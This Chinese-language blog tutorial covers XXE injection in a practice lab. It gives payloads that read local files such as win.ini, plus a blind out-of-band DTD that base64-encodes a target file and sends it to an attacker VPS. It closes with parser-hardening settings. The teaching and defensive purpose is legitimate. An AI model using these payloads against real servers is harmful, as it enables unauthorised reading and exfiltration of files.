XXE - XML外部实体注入攻击

已于 2023-01-04 18:14:38 修改
阅读量610 收藏
点赞数
分类专栏: web安全 文章标签: web安全
于 2023-01-04 18:11:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/javaEE_zero/article/details/128551902
版权

XXE漏洞是什么?

xxe(xml External Entity attack),在可以解析XML语言的地方,攻击者提交恶意的XML代码并被执行后,获取服务器中本应被保护的数据。对于XXE漏洞最为关键的部分是DTD文档类型,DTD 的做用是定义 XML 文档的合法构建模块。当容许引用外部实体时,经过恶意构造,能够致使任意文件读取、执行系统命令、探测内网端口、攻击内网网站等危害。DTD 能够在 XML 文档内声明,也能够外部引用;

XXE漏洞的原理

漏洞的根本原因是对非安全的外部实体进行解析处理导致的。常见的编程语言如PHP、JAVA、Python、.Net等使用不当均可能存在XXE漏洞。

  • php xxe

php xxe的漏洞根源在于libxml扩展库上。在低版本的libxml库(<=2.8)中,默认情况下未禁用外部实体的加载。当web因公使用xml进行数据传输,而后端未做任何安全处理直接解析xml数据就会导致xxe漏洞的产生。

  • java xxe

如 XMLReader、ValidatorSample、TransformerFactory、SAXParseFactory等第三方库。在默认情况下都未禁用外部DTD,当应用程序直接使用这些类解析XML而不做任何安全处理时将会导致xxe漏洞。

XXE漏洞的危害

  • 远程文件读取
  • 命令执行
  • 内网端口扫描
  • 攻击内网网站
  • dos攻击
  • ……

XXE漏洞的分类及利用

练习靶场:

GitHub - c0ny1/xxe-lab: 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo

靶机:192.168.77.130

VPS:192.168.77.155

回显xxe:

(1)引用内部实体

payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE admin[

<!ENTITY admin SYSTEM "file:///C:/Windows/win.ini">

]>

<user><username>&admin;</username><password>admin</password></user>

利用Burpsuite抓包

构建xxe攻击payload,读取靶机上的C:/Windows/win.ini文件

(2)引用外部实体

payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE admin[

<!ENTITY admin SYSTEM "http://192.168.77.155/1.dtd">

]>

<user><username>&admin;</username><password>admin</password></user>

利用burpsuite抓包,并构建payload读取vps机器上的文件内容

1.dtd文件

(3)参数实体

参数实体讲解:

# f.txt

<!ENTITY % msg "<!ENTITY msg2  'test dtd 111'>">



<?xml version="1.0"?>

<!DOCTYPE admin[

<!ENTITY % msg1 SYSTEM "http://192.168.77.155/f.txt">

%msg1;

%msg;

]>

<user><username>&msg2;</username><password>admin</password></user>

类似套娃,先是msg1访问后,执行http服务访问f.txt,再者参数实体msg访问f.txt中的参数实体,然后套中套,有个msg2,最后在外部实体中访问msg2即可成功。

利用靶场验证如下:

非回显型XXE

利用方式1:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE ANY[

<!ENTITY % remote SYSTEM "http://192.168.77.155/2.dtd">

%remote;

%all;

]>

<user><username>&send;</username><password>admin</password></user>

192.168.77.155/2.dtd

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=C:/1.txt">

<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.77.155/?content=%file;'>">

利用靶场实践如下:

1)构建payload并执行

2)查看vps上的access.log日志:

3)base64在线解码

利用方式2

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE aa[

<!ENTITY % remote SYSTEM "http://vps/2.dtd">

%remote;

%all;

%send;

]>

vps/2.dtd

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=C:/1.txt">

<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://vps/?content=%file;'>">

XXE漏洞的防御

  1. 确定使用到的第三方xml解析库版本,及时升级新版本。
  2. 升级PHP、JDK版本
  3. 在对xml解析时,禁止外部实体的引用,如
libxml_disable_entity_loader(true)

dbFactory.setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true)

dbFactory.setFeature(“http://xml.org/sax/features/external-general-entities”, false)

dbFactory.setFeature(“http://xml.org/sax/features/external-parameter-entities”, false)
……

另外,可以在菜鸟教程(runoob.com)上学习XML和DTD

^^_candice
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE(XML External Entity attack)XML外部实体注入攻击
mkl7717的博客
05-20 252
示例:]>©right;</author>
XML外部实体注入攻击
Ethan024的博客
04-17 169
实验环境: 皮卡丘靶场—XXE 实验步骤: 提交一个无害的内部实体: <?xml version="1.0"?> <!DOCTYPE note [ <!ENTITY hacker "1111"> ]> <name>&hacker;</name> 2. 指定读取系统文件: <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///e
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
dzqxwzoe的博客
05-29 1062
XML 实体允许定义标记,在分析 XML 文档时,这些标记将被内容替换。通常有三种类型的实体:内部实体外部实体参数实体。必须在文档类型定义 (DTD) 中创建一个实体,让我们从一个示例开始:正如你所看到的,一旦XML文档被解析器处理,它就会用定义的常量“JoSmith”替换定义的实体。正如你所看到的,这有很多优点,因为你可以在一个地方更改为例如“约翰史密斯”。js ``js在 Java 应用程序中,XML 可用于将数据从客户端获取到服务器,我们都熟悉 JSON API,我们也可以使用 xml
提供xml外部实体注入攻击的详细解说
最新发布
qq_38140936的博客
07-08 899
常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置。如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的。
XMLXXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1265
XXE:XML External Entity即外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
25、XXE-- XML外部实体注入攻击
WX公众号-小白学安全
04-07 720
文章目录概述XML外部实体PHP特殊函数危害payload防御靶场 概述 XXE ==>XML External Entity (XML外部实体) 原理:用户输入的数据被当做XML实体代码进行执行 XXE==>用户输入的数据被当做XML代码进行了执行,然后利用DTD部分可以通过SYSTEM关键词发起网络请求从而获得数据 XML 可扩展标记语言 设计宗旨:传输数据,而非显示数据 xml标签没有被预定义,需要自定义标签 特点 XML仅是存文本,不会执行任何事情 XML可以自己发明标签(允许定
XML注入攻击
壮乡码农
12-09 1532
一、XML攻击是什么? XML攻击和SQL注入类似,XML注入是将用户输入的数据当成节点处理。 二、攻击原理 攻击前提是使用XML作为存储数据的方式,在代码对xml进行查询或者修改时,用户输入的是节点,将攻击的节点保存到xml中,从而影响到程序的运行。 例如: String xml = "<username>"+request.getParameter("username")+"</username>" ...
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入XXE)引起的。Nexus Repository Manager 3是一款广泛使用的软件包仓库管理服务,它允许组织...
WEB安全XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
XXE - How to become a Jedi
02-20
如果 XML 解析器没有正确地限制外部实体的解析,那么攻击者可以通过构造恶意的 XML 文档来触发外部实体引用,从而获取敏感信息或执行其他恶意操作。 #### XXE示例 下面是一些 XXE 攻击的具体示例: - **读取本地...
你所不知道的XML安全——XML攻击方法小结
01-09
转载: 你所不知道的XML安全——XML攻击方法小结. XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XML schemas(遵循XML Schemas 规范)和documents type definitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体XML文档的一部分,允许引用外部资源,如文件系统、网络...
Web安全XML注入
热门推荐
brizer的博客
09-06 1万+
XML注入攻击,和SQL注入的原理一样,都是攻击者输入恶意的代码来执行自身权限以外的功能。 XML是存储数据的一种方式,如果在修改或者查询时,没有做转义,直接输入或输出数据,都将导致XML注入漏洞。攻击者可以修改XML数据格式,增加新的XML节点,对数据处理流程产生影响。攻击下面是一个保存注册用户信息为XML格式的例子:final String GUESTROLE = "guest_role";
XML外部实体注入攻击XXE
arissa666的博客
10-10 597
(可选)、
XML实体注入攻击
Lethe's Blog
08-15 1436
0x01 基础知识 一、XML XML教程 1、什么是 XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 2、XML 与 HTML...
XML 外部实体注入
2201_75370376的博客
06-22 967
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
XML外部实体注入--XXE漏洞
qq_62793621的博客
05-16 1691
XXE的原理及常见利用方式。
从原理到实战,详解XXE攻击
华为云官方博客
10-13 525
一站式提供xml外部实体注入攻击的相关基础概念、原理分析、实战演练、安全编码防御以及自动化防御工具。
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值